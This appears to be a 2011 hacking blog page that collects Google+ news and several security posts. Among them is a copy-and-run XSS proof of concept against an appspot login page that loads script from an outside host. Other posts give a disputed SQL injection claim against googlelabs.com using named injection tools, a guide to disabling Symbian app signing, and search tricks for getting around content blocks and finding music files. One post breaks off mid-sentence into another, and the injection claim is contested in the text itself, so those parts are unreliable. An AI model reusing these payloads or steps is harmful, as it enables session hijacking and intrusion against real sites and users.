Hackers can use Google+ servers to make DDos attack on ANY website!

Tuesday, August 30, 2011 // by Hacking Beast Editor // Labels: , , , , , , , , , , , // 0 comments

A new security hole has been discovered on the Google+ servers that would allow potential hackers to make DDos using Google’s Bandwidth.
Google+ has been under testing for quite sometime now and a tester at an Italian Security firm has reported that the Google+ servers can be used to make DDos requests to other websites.
The original sighting of this reports can be seen at IHTeam Security Blog by Simone Quatrini. He demonstrates how users can make use of Google’s server to act as a proxy and fetch content of any desired website. It is also noted that Google’s servers are more anonymous than other servers.
Here is the video for the news :

Cross Site Scripting Vulnerability at Google Appspot

Saturday, August 20, 2011 // by Hacking Beast Editor // Labels: , , , , , , , // 0 comments

The Google Appspot "ClickDesk" login page is vulnerable to Cross Site Scripting attack. Cross Site scripting attack is a critical issue in web application. When an attacker gets a user's browser to execute his/her XSS code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read (keylogging), modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting.

The vulnerability can easily be amplified by publicly available tools like Cross Site Scripting framework (XSSF), Cross Site Scripting harvest perl (XSS-Harvest) and so on.
Proof of concept:
The following proof-of concept sample will do a HTTP POST to trigger the XSS vulnerability from "XSS cheatsheet from ha.ckers.org" site. In real hacking situation, the injection source url will be hosted on some compromised web servers.

Copy the following code and save it as any .htm or html filename. Open it any browser to trigger it automatically.
*********

<script>
document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post">

<input type="hidden" name="command" value="login"><input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>"><input type="hidden" id="password" name="password" value="aaaa"></form>
';
document.getElementById("a").submit();

Google+ Pokes Facebook With Address Book Uploader

Monday, July 18, 2011 // by Anonymous // Labels: , // 0 comments

One of the most sought after feature in Google+ is an address book uploader. Why? mainly because Facebook is blocking third party apps like “Friend Exporter” from migrating data to Google+. So as an alternative, Google will now allow you to upload contacts in the standard CSV or vCard formats manually.GOOGLE PLUS LOGO Google+ Pokes Facebook With Address Book Uploader

Presently, adding friends from other sites is a herculean task as you have to either rely on buggy exporters or manually type in email-id’s of all your friends.

“Many email systems— and even some social networks — put users in charge of their own data by helping them export their contacts in the standard CSV or vCard formats.” wrote Google+ Product Manager Rohit Khare. He says their uploader won’t mix your imported contacts up with all of your other Google Contacts.

The feature comes after Google opened up itself for feedback and criticism from early adopters. In its other update, users will be able to set the privacy setting of their gender on their Google+ Profile from later this week.

Google To Include Google+ Results In Google Realtime

Monday, July 4, 2011 // by Anonymous // Labels: , , , // 0 comments

This was sooner than expected. Within a week of the arrival of Google+, Google has suspended its Realtime service to include the results of its social service into realtime results. Google tweeted this news on its official Realtime Twitter account today. Even though the service is accessible, it currently shows a 404 error page. Link for Realtime is missing in left bar as well as in news results.

Google in its tweet said,”We’ve temporarily disabled google.com/realtime. We’re exploring how to incorporate Google+ into this functionality, so stay tuned.”

Realtime currently accounts data from Twitter and Facebook for live-on-the-scene results. What would be interesting though is the percentage of allocation each service would get once Google+ is incorporated.

Google+ “Pages” For Businesses Coming Soon

// by Anonymous // Labels: , , // 0 comments

One thing that is presently missing in Google+ is profiles for brands and organizations. If news reports are to be believed, businesses and brands will soon be able to launch their profiles on Google+ as the company is working on a feature that would will be similar to Facebook Pages. Google’s head of Commerce and Local Jeff Huber confirmed this news after he commented about this feature in Mike Blumenthal’s blog. He wrote,”And pre-emptively answering a question — yes, we will have (smb) business profile pages on Google+. I can’t announce a launch date yet, but we want to make them *great*, and we’re coding as fast as we can.”GOOGLE PLUS LOGO Google+ Pages For Businesses Coming Soon

Google group product manager Christian Oestlien told SearhEngineLand that the company in future might enable Google+ to support businesses and brands. He added,”The things that matter for an individual user aren’t the same things that matter for businesses and we want to make sure both have a great experience in Google+.”

Google presently discourages people to create business profiles. Google+’s terms clearly states that Google Profiles doesn’t support profiles for couples or groups of people. Additionally, you can’t create a profile for a non-person entity such as a pet or business.

Google+ is New Facebook Rival

Sunday, July 3, 2011 // by Hacking Beast Editor // Labels: , , , // 0 comments

Not long ago social networking was ruled by Myspace. Now,it has been completely shadowed by Facebook which has an estimated 750 million users. At present there is no social networking site that could challenge the dominance of facebook. Finally Google has confirmed that it is working on its own Social networking Website called Google+.
It will be very difficult for any new social networking site to attract user’s.But it seems google has a large fanbase and it is quite possible that it will generate the curiosity among people to try something new.Currently, google+ project is not open for everyone. But those who have tested it have given it thumbs up.
Google+ has been broadly based on the concept of circles in which each circle represents a relation (colleagues, friends, family etc).In case of Facebook wall the content is shared with all friends but in goolge+ the content is shared among groups (circles) which makes a lot of sense as you don’t want to share same information with your Parents and Friends. You can also do group messaging as well as group video chat. The interface of google+ has been clean and very fast as compared to Facebook which is sometimes sluggish.

Moreover facebook has always battling with the privacy issues.Google is trying to take advantage in this area by making the privacy customizations very easy for its users.Whether Google can challenge Facebook or not can only be seen once it opens for

Hackers Release Step by step proof about this Vulnerability
1. Website : www.googlelabs.com or labs.google.com

2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer

Let’s Check Exploiting this Vulnerable link. Here Hackers use 3 Famous SQL Injection tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

1st Work with Havij Advance SQL Injection Tool:
Screen Shot 1: Scan Vulnerable link and it says this website is Vulnerable.

Screen Shot 2: Now it scans and gets all tables and columns

Screen Shot 3: Now you can see list of tables and Columns

And this is a Prove for this Website is Genuine SQL Injection Vulnerable. Here you see this database type is MS Access, so this is a Proof of this concept. Some people should Say Google Lab Database System is not Ms Access but this Website Database is Similar as Ms Access database and Ms Access SQL Injection Query are also Work on Google Labs Database system. As like MySQL 5 and MySQL 4.1 both are injected via Union select, but both are not have Information Schema.

2nd now Work with Safe3 SQL Injector v8.4:
Screen Shot 1: Analyzing Vulnerable link and it says it’s vulnerable and gets keyword and db type.

Screen Shot 2: Now it’s Inject the vulnerable link and gets All Table list and column list

This is another Prove for this Website Vulnerability and we can see this and Dangerous thing is its Exploitable. Now we check our last SQL Injection tool for 100% Satisfy.

3rd Pangolin SQL Injection Tool:
Screen Shot 1: Scan vulnerable link and its say this website is vulnerable

Screen Shot 2: Now inject this Website and get tables and columns list

Screen Shot 3: Here is a full List of Tables and Columns list

Now I think we are 100% Sure Google Lab Website is SQL Injection Vulnerable.

You Can Check Video. This Video is  also made by Bangladesh Cyber Army Member - Shadman Tanjim.

UPDATE :
Google insist that there has been no intrusion. The company claims that their GQL database won't allow SQL injection attacks. Additionally, they say that the data that appears in the screen shots, does not exist anywhere in their data stores.

On this Shadman Tanjim - Hackers Reply to Google "Proof it. because I am Also Proof it's Vulnerable. If they say's Google Lab is Not Vulnerable, It Means We get new Bugs in Some Famous SQL Injection tools. And also and 1=1 concept. So tell them to proof this and I don't think All tools are false. because 1 tools can false, 2 tools can get false but not All. ALL Tools say's it is Vulnerable, So i don't think it any confusion.

Google +1 Goes Global

// by Anonymous // Labels: // 0 comments

Google’s +1 button, the search giant’s challenger to the, is making its worldwide debut.

“Today, +1’s will start appearing on Google search pages globally,” Google Product Manager Nick Radicevic announced on Google’s AdSense blog.

“We’ll be starting off with sites like google.co.uk, google.de, google.jp and google.fr, then expanding quickly to most other Google search sites soon after.”

In addition to an international rollout on search result pages, Google is expanding its rollout of the +1 button on websites across the world. The company announced partnerships with several publications, including The Telegraph, The Independent, Last.fm, SnapDeal, and El Pais.

Google launched the +1 button last month as an attempt to increase its presence on the web. The button acts much like the Facebook Like or Twitter Tweet button. The company says it may use +1 data as a signal for improving search results in the future.

How to Hack Symbian S60 Phones to Install Unsigned Applications

Saturday, June 25, 2011 // by Hacking Beast Editor // Labels: , , , , , , // 0 comments

Hack Symbian S60 PhonesIf you own a Nokia Symbian S60 phone, you will most likely be aware of the fact that it is not possible to install applications on it unless they are signed using a valid certificate. Have you been trying to install applications on your S60 3rd or 5th edition phone but ending up getting a certificate error? At times, this can be really annoying; but here is a smart solution to this problem!
Here in this post, I will show you how to hack your Symbian S60 3rd or 5th edition smartphone, so as to modify the phone’s firmware and completely bypass the mandatory signing requirement. So, once you are done with this one time hack, you should be able to install any compatible application including unsigned and those with an expired certificate.

What is the Need for Signing Applications?
From the 3rd edition onwards, all the Symbian S60 applications need to be signed in order to ensure their integrity, so that it would not be possible for a third party to tamper with the application. Also, signing ensures that you always install applications from a trusted source.
However, there are many freeware and beta applications that come unsigned as the developers cannot afford to buy a symbian certificate. Hence, it can be a real nightmare for the users who need to install such applications on their phones. So, here is a step-by-step procedure to hack your phone and permanently disable this security feature.

1. Download HelloOX2 V2.03 or the latest version from the HelloOX2 Ofiicial Website.
HelloOX2 is an excellent tool to hack Symbian S60 3rd, 5th and Symbian^3 smartphones which makes it possible to install a root certificate by gaining full access to the phone’s system files. With this capability, you can install anything you want on your phones without the need to worry about the annoying certificate error!
2. The signed version of HelloOX2 demands for a donation and hence, only the unsigned version is available for free download. So, if you have the unsigned version, you need to sign it before installing on your phone. In order to sign any application, you need to have the certificate and the key file which can be obtained as follows:
  • Go to the OPDA Website, get registered and login to your account.
  • Click on the “Apply Certificate” tab, enter the model number and the IMEI of your phone and then click on “Submit and Upload” button.
  • It will usually take up 24 hours for your certificate and key file to be generated and uploaded. To check the status of your certificate click on “My Certificate” tab. If the certificate is ready for the download you will see something as follows:
OPDA Certificate Status

  • Download the certificate and the key file on to your computer. Also download the SisSigner tool to sign your HelloOX2 application.
  • Open the SisSigner, load the HelloOX2.sis, certificate and the key file as shown below and click on “Sign”. Leave the “Key File Password” field blank.
SisSigner

  • Your HelloOX2 application is now signed and ready for the installation.
3. Install the signed HelloOX2 application on your phone and run it to start the hacking process, which is completely automatic. Within a minute your phone will be hacked. Once this is done, say goodbye to the annoying certificate error and install any application.
I hope you like this post. Express your opinion through comments. Enjoy!!!

When it comes to the Google search box, you already know the tricks: finding exact phrases matches using quotes like "so say we all"or searching a single site usingsite:lifehacker.com gmail. But there are many more oblique, clever, and lesser-known search recipes and operators that work from that unassuming little input box. Dozens of Google search guides detail the tips you already know, but today we're skipping the obvious and highlighting our favorite obscure Google web search tricks.

10. Get the local time anywhere

What time is it in Bangkok right now? Ask Google. Enter simply what time is it to get the local time in big cities around the world, or add the locale at the end of your query, like what time is it hong kong to get the local time there.

9. Track flight status

Enter the airline and flight number into the Google search box and get back the arrival and departure times right inside Google's search results.

8. Convert currency, metrics, bytes, and more

Google's powerful built-in converter calculator can help you out whether you're cooking dinner, traveling abroad, or building a PC. Find out how many teaspoons are in a quarter cup (quarter cup in teaspoons) or how many seconds there are in a year (seconds in a year) or how many euros there are to five dollars (5 USD in Euro). For the geekier set, bits in kilobytes (155473 bytes in kilobytes) and numbers in hex or binary (19 in binary) are also pretty useful.

7. Compare items with "better than" and find similar items with "reminds me of"

Reader Adam taps the wisdom of the crowds by searching for like items using key phrases. He writes in:
Simply search for, in quotes: "better than _keyword_"
Some example results:

Results 1 - 100 of about 550 English pages for " better than WinAmp".

Results 1 - 57 of 57 English pages for " better than mIRC".
Results 1 - 100 of about 17,500 English pages for " better than Digg". (Wow. Poor Digg.)
The results will almost always lead you to discovering alternatives to whatever it is you're searching for. Using the same concept, you can use this trick to discover new music or movies. For example, " reminds me of _someband_" or "sounds like _someband_" will pull up artists people have thought sounded similar to the one you typed in. This is also a great way to find good, no-name musicians you'd probably never know of otherwise.
Examples:

Results 1 - 88 of 88 English pages for " reminds me of Metallica".

Results 1 - 36 of 36 English pages for " similar to Garden State".

Results 1 - 66 of 66 English pages for " sounds like The Shins".
Just get creative and you'll, without a doubt, find cool new stuff you probably never knew existed.

6. Use Google as a free proxy

What, your company blocks that hip new web site just because it drops the F bomb occasionally? Use Google's cache to take a peek even when the originating site's being blocked, with cache:example.com.

5. Remove affiliate links from product searches

When you're sick of seeing duplicate product search results from the likes of eBay, Bizrate, Pricerunner, and Shopping.com, clear 'em out by stacking up the -site:ebay.com -site:bizrate.com -site:shopping.com operator. Alternately, check out Give Me Back My Google (original post), a service that does all that known reseller cleaning up for you when you search for products. Compare this GMBMG search for a Cruzer 1GB flash drive to the regular Google results.

4. Find related terms and documents

Ok, this one's direct from any straight-up advanced search operator cheat sheet, but it's still one of the lesser-used tricks in the book. Adding a tilde (~) to a search term will return related terms. For example, Googling ~nutrition returns results with the words nutrition, food, and health in them.

3. Find music and comic books

Using a combination of advanced search operators that specify music files available in an Apache directory listing, you can turn Google into your personal Napster. Go ahead, try this search for Nirvana tracks: -inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) "Nirvana". (Sub out Nirvana for the band you're interested in; use this one in conjunction with number 7 to find new music, too.) The same type of search recipe can find comic books as well.

2. ID people, objects, and foreign language words and phrases with Google Image Search

Google Image search results show you instead of tell you about a word. Don't know what jicama looks like? Not sure if the person named "Priti" who you're emailing with is a woman or a man? Spanish rusty and you forgot what "corazon" is? Pop your term intoGoogle Image Search (or type image jicama into the regular search box) to see what your term's about.

1. Make Google recognize faces

google-face-recogniton_sm.pngIf you're doing an image search for Paris Hilton and don't want any of the French city, a special URL parameter in Google's Image search will do the trick. Add &imgtype=faceto the end of your image search to just get images of faces, without any inanimate objects. Try it out with a search for rose(which returns many photos of flowers) versus rose with the face parameter.
